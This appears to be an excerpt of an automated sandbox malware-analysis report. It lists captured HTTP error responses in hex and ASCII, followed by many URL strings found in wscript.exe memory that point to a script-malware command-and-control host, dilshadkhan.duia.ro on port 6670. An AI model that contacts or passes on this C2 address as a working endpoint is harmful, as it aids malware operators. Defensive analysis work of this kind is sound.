75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:49:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:49:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:49:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:50:15 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:50:18 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 16:50:20 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Fri, 27 May 2022 16:50:27 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: wscript.exe, 00000001.00000002.830179135.000001922AD6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6
Source: wscript.exe, 0000000F.00000002.812070527.000001D194C8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.801022285.00000060A61E2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 0000000F.00000003.488153509.000001D195845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.811908702.000001D1932BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813598655.000001D195883000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813530801.000001D195855000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.789130459.000001D195886000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.631861222.000001D195879000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.488218904.000001D19584E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.785348224.000001D19585A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 0000000D.00000002.833414206.0000013D91828000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.808179818.0000013D8F3D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-
Source: wscript.exe, 0000000A.00000002.831598463.00000216E0843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-0
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((O
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((o
Source: wscript.exe, 00000001.00000003.548832551.000001922CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723341261.000001922CD95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.548963430.000001922CD45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.830621211.000001922CCE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723276252.000001922CD8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723406445.000001922CD8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723721357.000001922CD98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723080195.000001922CD6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.549020928.000001922CD60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 0000000A.00000003.607484404.00000216E083B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607801678.00000216E0843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre02-00600806D9B6
Source: wscript.exe, 0000000F.00000002.813488182.000001D195830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre088214C05064EeSI
Source: wscript.exe, 0000000F.00000003.784432327.000001D19585E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0n
Source: wscript.exe, 0000000F.00000003.785149564.000001D195845000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.785408802.000001D195848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1dG
Source: wscript.exe, 0000000D.00000003.632311983.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1v
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre5
Source: wscript.exe, 0000000F.00000003.785408802.000001D195848000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre8
Source: wscript.exe, 0000000F.00000002.805316166.000001D193220000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre;
Source: wscript.exe, 0000000D.00000003.789581563.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre=
Source: wscript.exe, 0000000A.00000002.831511243.00000216E07E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreC
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreC:HOMEPATH=
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQppZiAo
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1
Source: wscript.exe, 0000000D.00000003.632311983.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreIFIER=Intel64
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrO
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrro
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812626213.0000013D8F4A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.785308898.0000013D8F49D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.784860843.0000013D8F496000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789816311.0000013D8F4A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789955238.0000013D8F4B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.789175287.0000013D8F49E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818642353.0000013D917AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.631938805.000001D1932EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 0000000D.00000003.631428377.0000013D91838000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.833368380.0000013D917F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreO
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreOI
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePro
Source: wscript.exe, 0000000A.00000002.807825968.00000216DE018000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreVE
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrE4
Source: wscript.exe, 00000001.00000003.723753855.000001922CD85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723248716.000001922CD7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723487239.000001922CD85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723080195.000001922CD6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre_
Source: wscript.exe, 00000001.00000002.837475499.000001922CD9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrea
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuE4
Source: wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuO
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuo
Source: wscript.exe, 00000001.00000002.837519224.000001922CEA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 0000000F.00000002.813488182.000001D195830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredI
Source: wscript.exe, 0000000A.00000002.808195636.00000216DFFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.812768538.0000013D91390000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.812147532.000001D1951F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredmFyIGN0
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreecuritycenterre
Source: wscript.exe, 0000000A.00000002.815966178.00000216E0780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759788856.00000216E0787000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.607995177.00000216E0787000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreg
Source: wscript.exe, 0000000A.00000003.607735346.00000216DE10A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VregpOw
Source: wscript.exe, 0000000D.00000002.812596470.0000013D8F474000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrei4
Source: wscript.exe, 0000000F.00000003.488309896.000001D19582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrejIJ
Source: wscript.exe, 0000000A.00000003.759941914.00000216DE0D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrek
Source: wscript.exe, 0000000A.00000003.759941914.00000216DE0D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.807977026.00000216DE0B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760062460.00000216DE0EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.759702647.00000216DE0CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.760032605.00000216DE0E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrem
Source: wscript.exe, 0000000A.00000003.607955279.00000216DE0F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2Pacv
Source: wscript.exe, 0000000A.00000002.831489692.00000216E07D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 0000000F.00000003.631938805.000001D1932EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo_
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreok
Source: wscript.exe, 0000000F.00000002.813389794.000001D1957CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreol
Source: wscript.exe, 00000001.00000003.723658631.000001922CD55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.723636243.000001922CD45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreows
